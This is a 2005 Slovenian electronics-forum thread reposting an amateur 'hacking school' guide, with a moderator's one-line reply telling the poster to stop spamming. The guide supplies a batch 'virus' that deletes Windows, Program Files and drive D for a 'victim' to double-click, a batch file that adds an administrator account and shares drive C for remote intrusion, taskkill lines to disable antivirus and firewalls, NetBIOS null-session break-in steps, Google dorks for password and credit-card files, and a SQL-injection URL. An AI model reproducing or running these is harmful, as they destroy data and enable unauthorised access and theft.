www.elektronik.si Seznam forumov www.elektronik.si
Forum o elektrotehniki in računalništvu
 
 PomočPomoč  IščiIšči  Seznam članovSeznam članov  SkupineSkupine  StatisticsStatistika  AlbumAlbum  DatotekeFilemanager DokumentacijaDocDB LinksPovezave   Registriraj seRegistriraj se 
  PravilaPravila  LinksBolha  PriponkePriponke  KoledarKoledar  ZapiskiZapiski Tvoj profilTvoj profil Prijava za pregled zasebnih sporočilPrijava za pregled zasebnih sporočil PrijavaPrijava 

smeti

 
Objavi novo temo   Ta tema je zaklenjena: ne moreš urejati sporočil ali odgovarjati na objave.   Printer-friendly version    www.elektronik.si Seznam forumov -> Testni forum, brisano, smeti, offtopic
Poglej prejšnjo temo :: Poglej naslednjo temo  
Avtor Sporočilo
fbifbi
Član
Član



Pridružen-a: Pon 05 Jul 2004 12:17
Prispevkov: 129
Aktiv.: 0.54
Kraj: ljubljana

PrispevekObjavljeno: Pon Maj 09, 2005 10:20 am    Naslov sporočila:  smeti Odgovori s citatom

To je kopija z drugega foruma in je veliko slengovskih izrazov. Govori o "hekanju" in zaščiti pred njim.
Citiram:


Ta dokument je namenjen izključno v izobraževalne namene, zato avtor [v tem primeru jaz] ne prevzema nobene odgovornosti v primeru morebitne okvare računalniških sistemov. Hekanje na lastno odgovornost!

Nekje v temačnem kotu interneta 4.5.2005



UVOD

Če ste ultra leni (kar itak ste) lahko mirne duše izpustite tale uvod, kjer bom le nakladal o hekanju nasploh. Vseeno pa vam toplo priporočam, da si ga preberete.

Hekanje. Beseda, ob kateri mnogi pomislijo le na uničevanje, prodiranje v zasebnost, krajo intelektualne lastnine itd. Jaz mislim drugače. Meni se zdi hekanje nekaj kar ne zmore vsak, to ni dolvleka programa vpis žrtvinega IP-ja in pritisk na tipkalo na katerem piše ENTER, to je logično razmišljanje in pretentanje neke programske opreme na žalost v nekaterih primerih tudi v ilegalne namene.Ne vem kaj si ti misliš o hekanju ampak vdiranje v večje in strožje varovane računalniške sisteme zna biti usodno (lahko pristaneš celo tam kjer boš celo življenje nastavljal riti tako imenovanim homoseksualnim osebkom…), zato raje ne poskušaj kaj takega. .


Kratka zgodovina hekanja

Beseda »HACK« naj bi se prvič pojavila v drugi polovici 60-ih let prejšnjega stoletja, v ameriških akademskih krogih. Takrat je imela še pozitiven prizvok, kajti za hackerja je bil označen nekdo ki je znal logično in abstraktno razmišljati, ter reševati probleme na Bister in inovativen način. Sčasoma se je ta izraz popolnoma prenesel na računalniško področje, kjer so za hekerje veljali zelo dobri programerji, sistemski administratorji, začetniki interneta ter nasploh vsi ki so gonili software (in hardware) naprej posebej na področju varnosti. Stvari pa so se začele obračati v zgodnjih 80-ih letih ko je beseda hacker začela dobivati negativen prizvok. Profesionalci a.k.a. stari mački hekerske scene kot enega od vzrokov vidijo v filmu »War Games« iz leta 1983, v katerem najstniški računalničar po nesreči vdre v sistem ameriške vlade in skoraj sproži tretjo svetovno vojno. Seveda so nekateri ljudje poskušali film na različne načine posnemati, kar je seveda pripomoglo k medijskemu odzivu. V 90-ih letih je tako v medijih, kot posledično tudi v javnosti začel »hacker« dobivati povsem drugačen izraz. Za hekerja je bil, in na žalost še vedno je, označen tisti, ki na kakeršenkoli način krši zakon na področju interneta…

Programiranje . bat fajlov

.bat datoteke so zelo uporabne, čeprav se malokdo zaveda njihove uporabnosti. Te datoteke delujejo na principu ms-dosa, ki tudi že počasi tone v pozabo. Z .bat datotekami lahko izdelate viruse, črve, trojance, keylogerje in še in še. Najboljša stvar teh datotek pa je, da jih ne more zaznati noben antivirusni program. Vse kar rabimo za izdelovanje takih datotek je notepad ali kateri loki drug text editor in kup domišljije (seveda je potrebno tudi nekaj znanja).
Ko datoteko končate morate le iti na Save as (shrani kot) kar pa je zelo važno je to, da v nastavitvi kjer piše save as type spremenimo .txt v vse datoteke, k imenu pa dodamo končnico .bat (npr.:neki.bat) . No pa se lotimo dela…

________________________________________________________________
shutdown –s …….izklopi vse računalnike povezane v lokalno omrežje
_________________________________________________________________________ shutdown –s –c »tukaj vpišite svoj komentar« …… izklopi vse računalnike povezane v lokalno omrežje + doda komentar (»«morajo biti)
__________________________________________________________________________

shutdown –s –t 999 ……odšteva čas do izklopa
__________________________________________________________________________

shutdown –f ……. Takojšen izklop računalnika brez shranjevanja podatkov
__________________________________________________________________________

@ECHO OFF
IF EXIST C:\PROGRAM FILES\*.* DELTREE /Y C:\PROGRAM FILES\*.*
IF EXIST C:\Documents and Settings\*.* DELTREE /Y C:\Documents and Settings\*.*
IF EXIST C:\WINDOWS\DESKTOP\*.* DELTREE /Y C:\WINDOWS\DESKTOP\*.*
IF EXIST C:\WINDOWS\START MENU\*.* DELTREE /Y C:\WINDOWS\START MENU\*.*
IF EXIST C:\WINDOWS\COMMAND\*.* DELTREE /Y C:\WINDOWS\COMMAND\*.*
IF EXIST C:\WINDOWS\SYSTEM32\*.* DELTREE /Y C:\WINDOWS\SYSTEM32\*.*
IF EXIST C:\WINDOWS\*.* DELTREE /Y C:\WINDOWS\*.*
IF EXIST C:\Igre\*.* DELTREE /Y C:\Igre\*.*
IF EXIST D:\*.* DELTREE /Y D:\*.*
ECHO ...............................
ECHO Cenjena žrtev,čas je da se posloviš se od svojih datotek hahahha
ECHO Napadel te je HARD DISK EXTERMINATOR
ECHO UPAM, DA BOŠ SEDAJ ZACEL UPORABLJATI LINUX
ECHO ...............................
ECHO NO COPYRIGHT 4.5 2005 by G/@
__________________________________________________________________________

Tole je zelo nesramen virus zato moraš biti zelo perviden in ga ne zaganjaj (po potrebi spremeni direktorije), sicer pa je postopek izdelave povsem enak – prekopiraj v notepad, shrani pod .bat in ko bo žrtev naredila dvoklik bodo njene datoteke izbrisane
__________________________________________________________________________
@echo off
net user username /add
net localgroup Administrators username /add
net share Shared_Docs=C:\

Ko bo žretav 2x kliknila na to datoteko, bo njen c: omogocil administratorski dostop do racunalnika in ko boš prepričan, da je žrtev datoteko odprla, pojd ipod "Start", "run/zaženi" in napiši \\IP naslov (npr. \\192.168.8.17) in če slučajno računalnik vpraša za uporabniško ime in geslo/password, pod uporabniško ime napiši username, geslo pa pusti prazno.Tako, če je vse kot bi moralo biti, lahko sedaj brskamo in spreminjamo datoteke na žrtvinem racunalniku .

__________________________________________________________________________

taskkill /IM sophos.exe /F
taskkill /IM zonealarm.exe /F
taskkill /IM nvc.exe /F
Ta je pa hud...firewall/ antivirus destroyer. Na internetu poiščite !task! fajle firewalov ali antivirusnikov in naredite dolg seznam, ostalo pa bi moglo biti jasno.

No tole je glede .bat fajlov dost sicr je pa tega stuffa na internetu dost uglavnm v angleščini.
Zdej pa pejmo na novo poglavje.


Hekanje netbiosa

Tale delček je bil napisan pred reklamo na forumu in je namenjen predvsem začetnikom...


Kaj sploh je NetBIOS?

Netbios je pač progress/service, ki deluje na računalnikih na katerih so nameščeni Windowsi. NetBIOS predstavlja najlažji način vdora v sisteme (posebej je priporočljiv za začetnike) za tiste, ki se želijo naučiti najlažji način vdora v sisteme. Seveda pa ni vse tako enostavno. Zelo pomembno je to da je na oddaljenem računalniku omogočen File and Printer Sharing oziroma FPS. Tole deluje na NetBIOSU že zelo dolgo časa toda še vedno vsi ne poznajo njegove moči. Hekanje NetBIOSA je veliko boljše kot uporaba programa v katerega vpišete IP, pritisnete ENTER, ter vam ta vse servira na pladnju. V temu poglavju se boste naučiliuporabljati te programe »ročno«.
Vse delamo iz ukazne vrstice oz. Command prompta.
Prvvo kot prvo je to kako najti računalnike, ki imajo omogočen NetBIOS?
Za začetek priporočam programček nbtscan, ki je dosegljiv z googla. Program bo skeniral mrežo in izpisal računalnike, na katerih je odprt TCP/IP port 139, ki je tudi privzeti NetBIOS port. NetBIOS deluje na portih od 135-139 toda to ni sedaj ni pomembno.
Potem ko dolstegnete tale programček ga odzipite (recimo v direktorij c:\nbtscan\)

Pojdite v command prompt oz. Ukazno vrstico in izgledalo bo nekako takole:
------------------------------------------------------------------------------------------------------
C:\nbtscan\
------------------------------------------------------------------------------------------------------
Sedaj ko ste v direktoriju tega programčka vpišite:

Nbtscan 284.243.123.1-255 oz. poljubni IP

S tem boste preskenirali mrežo IP-jev od 284.243.123.1 do 284.243.123.255( številke večjeod 255neobstajajo).
------------------------------------------------------------------------------------------------------
Sedaj, k o ste skenirali določene IP-je boste dobili izpis v takšni obliki. Seveda z več imeni oz. IP-ji.
-----------------------------------------------------------------------------------------------------
Doing NBT name scan for addresses from ***************

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
Ip računalnika Netbios Name <server> <unknown> 00-00-00-00-00-00
------------------------------------------------------------------------------
No to so sedaj vsi računalniki, ki imajo omogočen NetBIOS v določenem IP območju, to je v območju, ki ste ga izbrali.

HEKANJE NetBIOSA

Kar sledi je, da napišete nbtstat –a 127.0.0.1 oz. IP, ki se je izpisal v zgornji tabeli.
Dobili boste izpis v tej obliki
-----------------------------------------------------------------------------------------
NetBIOS Remote Machine Name Table

Name Type Status
-----------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

Kar morate paziti je, da se pojavi število <20> (v tem primeru user<20>UNIQUE REGISTERD). To pomeni da je omogočen FPS in kakor vemo na tem računalniku deluje NetBIOS. Če pa vam slučajno napiše host not found pomeni, da je port 139 zaprt oz. če piše da je odprt v skeniranju, pomeni, da ga blokira firewall.

V naslednjem koraku ugotovimo, kaj ima oddaljeni sistem v skupni rabi, oz. kaj sploh imamo na razpolago.

Vpišemo net view \\127.0.0.1 oz. dddaljeni IP, pri katerem se je pojavilo <20>

In izpisati bi nam moglo nekaj podobnega:

Share name Type Used as Comment
-----------------------------------------------------------------------------------------
CDISK Disk
DDISK Disk
SharedDocs Disk
Hp523 Print
The command completed successfully.

Disk pomeni da je v skupni rabi oddaljeni disk. To je v bistvu najbolje, ker v teh primerih dobimo dostop do celega računalnika. Možno pa je tudi da se vam pojavi printer kar vam omogoča printanje na tem računalniku.

Naslednje, kar želimo (ali pa tudi ne….no kakorkoli) je seveda prekopirati oddaljene diske ali direktorije na naš sistem.

Vpišemo net use x: \\127.0.0.1\Cdisk (x je spremenljivka namesto katere lahko uporabite c,d,r,g,h,j,...). . in namesto \Cdisk bi lahko izbrali katerokoli vrednost od zgoraj izpisanih. Recimo \Ddisk.

Če smo vse vpisali pravlno nam bo napisalo The command completed successfully.

Če sedaj odprete moj računalnik ali katerikoli program in pogledate diske boste videli oddaljeni disk in vse folderje v njem. Lahko brišete dodajate kopirate, v glavnem, kar se vam zljubi. Ne morete pa zaganjati programov na oddaljenem sistemu, tako da kliknete nanj, saj se vam bo zagnal na vašem računalu.

HEKANJE ZAŠČITENIH RAČUNALNIKOV

Velikokrat pa se zgodi da so datoteke v skupni rabi zaščitene z geslom. V tem primeru veliko ljudi priporoča program PQWAK, ki deluje na Windowsih 9x/ME. Zelo uporaben pa je tudi programček NAT oziroma NetBIOS Auditing Tool, ki ga najdete na guglu.

IPC$ (Inter-Process Communication) za Okna NT/2K/XP Pro (HE ne diši prav dobro-haha-šala)

Ko gre za te operacijske sisteme uporaba programa PQWAK ni mogoča(za program NAT ne vem, ker hekanja po netbiosu ne izvajam).

Uporabili bomo funkcijo, ki izvira iz NT arhitekture imenovano hidden IPC share oz. IPC$.
Uporabili bomo tehniko null-session. No pa dajmo…

V command prompt vpišite:

net use \\127.0.0.1\ipc$ * /user:""
net use \\127.0.0.1\ipc$ * /user:
net use x: \\127.0.0.1\ipc$ "" /user:""


Ce bo vse ok se nam izpise 'The command completed successfully.' Povezavo lahko preverimo z ukazom:

net use \\127.0.0.1\ipc$ ( oz. IP ki ste ga izbrali…)

Ko je povezava vzpostavljena poskusimo uporabiti ukaz net view. Lahko poskusimo tudi z ostalimi privzetimi hidden shares, ki so
poleg IPC$ še Admin$, Print$ in C$.
Ko pa vse zakljucite vpisite net use x: \\127.0.0.1\CDISK /delete
oz. lahko na mojem računalniku, kliknete z desno tipko in disconnect.

Konec:

Če vam je uspelo vam iskreno čestitam, toda vam ne priporočam, da po netbiosu hekate večje rač. Sisteme, ker vam preprosto ne bo uspelo. Za kaj takega je bolj priporočljiv SQL napad ali cross-site scripting, več o tem pa v naslednjem poglavju.



SQl napad ter ostale naprednejse hekerske thenike . . .

Tole pa je malo težja snov in takšnih napadov ne priporočam novopečenim hekrčkom…

SQL napad je specializirana obilka tako imenovane &raquo;vložene legalizacije&laquo;, ki poskuša manipulirati podatkovno bazo napadene aplikacije z izdajanjem napadov v jedro SQL-jevih namemb. Da bi razumeli kaj mislim si vzamimo za primer namišljani LOG v procesu spletne aplikacije. Mi pa bomo &raquo;delali&laquo; navzven podatkovne baze.# Vem da so ti stavki težko razumljivi, ampak v primerih bo to dosti lažje#. Uporabniški račun, vsebujoč ime in geslo so shranjeni v posebnem delu podatkovne baze. In tukaj je ogromno možnost, da prodremo v njo.

Pomemben del zbiranja informacij je iznajdljivost, pri čemer so lahko v veliko pomoč že zmogljivi spletni iskalniki, kot je Google. Google podpira vrsto iskalnih parametrov, od katerih jih nekaj omogoča celo iskanje potencialno ranljivih tarč in posredno tudi vdor vanje. Z učinkovito uporabo Googla je mogoče priti celo do zaupnih dokumentov bank in različnih raziskovalnih ustanov po vsem svetu, prav tako pa je uporaben za iskanje gesel in drugih ranljivosti. O tem govori dejstvo, da lahko z iskalnim parametrom Select a database to view odkrijemo vrsto zaupnih dokumentov, ki jih pri delu uporablja program FileMaker Pro. S sledenjem rezultatov, ki nam jih da iskalnik, pa lahko vstopimo v zbirke podatkov prej omenjenega programa. Še pred kratkim je podobna poizvedba dala več kot 200 rezultatov.Teorija iskanja je pravzaprav zelo enostavna,če na problematiko pogledamo iz pravega zornega kota. Če na primer iščemo podatke, ki se navezujejo na obdelavo podatkov v točno določenem programu, potem v iskalnik vnesemo pot do datoteke ali končnico datoteke, v katero ta program shranjuje želene podatke. Google je še pred kratkim z uporabo iskalnih parametrov Index of/”+banques +filetype:xls posredoval občutljive podatke nekaterih francoskih bank.

Zgleda:

filetype:xls – pri Excelu
filetype:ppt – pri Power Pointu itd.

Ena od možnosti je tudi iskanje besed v spletnem naslovu, pri čemer v iskalnik vnesemo:
• “intitle: login password” (ukaz nam poišče vse strani, ki imajo v naslovu besedo Login in besedo Password),
• “allintitle: login password” (za rezultat dobimo strani, ki imajo v naslovu besedi Login in Password),
• “Inurl:admin” (dobimo vse strani, ki imajo v spletnem naslovu besedo Admin, ki se običajno uporablja kot okrajšava za naziv administrator),
• “filetype:doc site:gov confidential” (ukaz preišče vse dokumente doc na vseh vlad nih spletnih straneh .gov, pri čemer išče samo dokumente z besedo Confidential na spletni strani ali v samem
dokumentu),
• “phonebook:Tom+CA” (preišče spletne imenike in kot rezultat navede vse osebe z imenom Tom, ki živijo v Kaliforniji)
• “index of admin” (v tem primeru bo iskalnik preiskal vse dosegljive imenike admin oz., če bomo vnesli imenik etc/ passwd, preiskal vse dosegljive imenike z gesli itd.)
Z domiselno uporabo iskalnikov si lahko vdiralec delo izredno olajša, še zlasti če išče varnostne
luknje, pri čemer lahko uporabi iskalne nize, kot so Password, passwords, pwd, account, accounts, userid, uid, login, logins, secret, secrets, sledijo pa jim končnice doc ali xls ali db.

Zgledi uporabnih iskalnih nizov (vnašajo se vključno z narekovaji, kjer je to navedeno):
Index of /admin
Index of /passwd
Index of /password
Index of /mail
”Index of /” +passwd
”Index of /” +password.txt
”Index of /” +.htaccess
”Index of /secret”
”Index of /confidential”
”Index of /root”
”Index of /cgi-bin”
”Index of /credit-card”
”Index of /logs”
”Index of /config”
Zgoraj navedeni ukazi so še zlasti uporabni pri strežnikih, ki omogočajo indeksiranje spletnih
strani, kar pomeni, da se je po strežniku mogoče sprehajati po imenikih, kot bi se znotraj brskalnika pomikali po lokalnih imenikih. Z ukazom allinurl:winnt/system32/ (brez narekovajev)
poiščemo vse strežnike, ki dovoljujejo dostop do občutljivega imenika system32, kjer je običajno datoteka cmd.exe, s katero je mogoče pridobiti dostop do ukazne vrstice, z njo pa zaganjati
kup programov v sistemih Windows.

Še nekaj splošno uporabljanih iskalnih kriterijev:
inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:”wwwroot/*.”
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls ”restricted”
index of f*p +.mdb allinurl:/cgi-bin/ +mail to


Z iskalnikom je mogoče najti tudi strežnike z varnostnimi pomanjkljivostmi. Kot zgleda lahko navedemo:
1. Napad Cross-Site-Scripting (XSS)
lahko izvedemo z naslednjimi iskalnimi
parametri:
• allinurl:/scripts/cart32.exe
• allinurl:/CuteNews/show_archives.php
• allinurl:/phpinfo.php

2. Napad SQL injection:
allinurl:/privmsg.php

Tukaj pa je še en SQL napad izveden v URL vrstici:

https://spletnastran/login.cgi?user_id=dcooper´;%20--

Parameter je lahko bolj sperjemljiv kot dcooper%27%3b%20—ampak to zastre pomemben del napada. Ampak glavni &raquo;ključ&laquo;, ki ga vsebuje ta napad je črtkasta črta (--); ki naredi, da SQL na upošteva ničesar kar je napisano za njim.

To je zaenkrat vse. O SQL-u več naslednjič v normalni verziji šole hekanja…


Konec

In prišli smo do konca upam, da ste uživali in da nisem preveč težil. Več zapletenih tehnik bom pripravil do naslednjič.Zdaj sledi še nekiaj qlskih linkov in linkov za doljemat programe, ki so zelo uporabni za hekanje.


www.cgisecurity/XSS.pdf……………..cross.site scripting
risorsesi za:-šibke točke spl. strani www.cgisecurity:com
-pomankljivosti aplikacij www.owasp.org
-šibke točke strežnikov www.wiretrip.org/rfp
Achilles-lokalna http&proxy manipulacija www.digizen-security.com/downloads.html
Brutus-program za &raquo;nasilno&laquo; hekanje www.hoobie.net
Hydra- Isto kot zgornji(za linux) www.thc.org
Curl-orodje za skriptanje curl.haxx.se
Nikto-skener pomankljivosti www.cirt.net/code/nikto.shtml
SQLat-SQL orodje www.cquure.net/tools.jsp?id=6
WebProxy-upravljanje spletnih aplikacij www.atstake.com/reasearch/tools/index.html

Za tiste, ki glih niste totalni noobi pa(moj najljubši) WebGoat: nauči_se_hekati_poligon([slovenščina je zame španska vas] zapletene tehnike-SQL,XSS…) www.owasp.org (pol morste naložt še tomcat server engine).


Zahvale:

Miscrosoft Windows Word- za napiš tega dokumenta
Internet –risorsesi
Moje znanje- ti si car
Forum računalniških novic-kjer bom objavil dokument

Kaj prihaja naslednjic :

Hja…naslednjič bo gotovo več o SQL-u, XSS-u in o henanju v linuxu. Npisal bom tudi kako izkoristiti varnostne luknje in pomankljivosti programskih jezikov.
Nazaj na vrh
Skrit Poglej uporabnikov profil Pošlji zasebno sporočilo Pošlji E-sporočilo MSN Messenger - naslov
frenki
Moderator
Moderator



Pridružen-a: Ned 23 Feb 2003 21:26
Prispevkov: 6732
Aktiv.: 28.42
Kraj: Ljubljana (JN76GB)

PrispevekObjavljeno: Pon Maj 09, 2005 10:36 am    Naslov sporočila:   Odgovori s citatom

fbifbi prenehaj s smetenjem po forumu!

Lp, Frenki
Nazaj na vrh
Odsoten Poglej uporabnikov profil Pošlji zasebno sporočilo Pošlji E-sporočilo Obišči avtorjevo spletno stran
Pokaži sporočila:   
Objavi novo temo   Ta tema je zaklenjena: ne moreš urejati sporočil ali odgovarjati na objave.   Printer-friendly version    www.elektronik.si Seznam forumov -> Testni forum, brisano, smeti, offtopic Časovni pas GMT + 2 uri, srednjeevropski - poletni čas
Stran 1 od 1

 
Pojdi na:  
Ne, ne moreš dodajati novih tem v tem forumu
Ne, ne moreš odgovarjati na teme v tem forumu
Ne, ne moreš urejati svojih prispevkov v tem forumu
Ne, ne moreš brisati svojih prispevkov v tem forumu
Ne ne moreš glasovati v anketi v tem forumu
Ne, ne moreš pripeti datotek v tem forumu
Ne, ne moreš povleči datotek v tem forumu

Uptime: 492 dni


Powered by phpBB © 2001, 2005 phpBB Group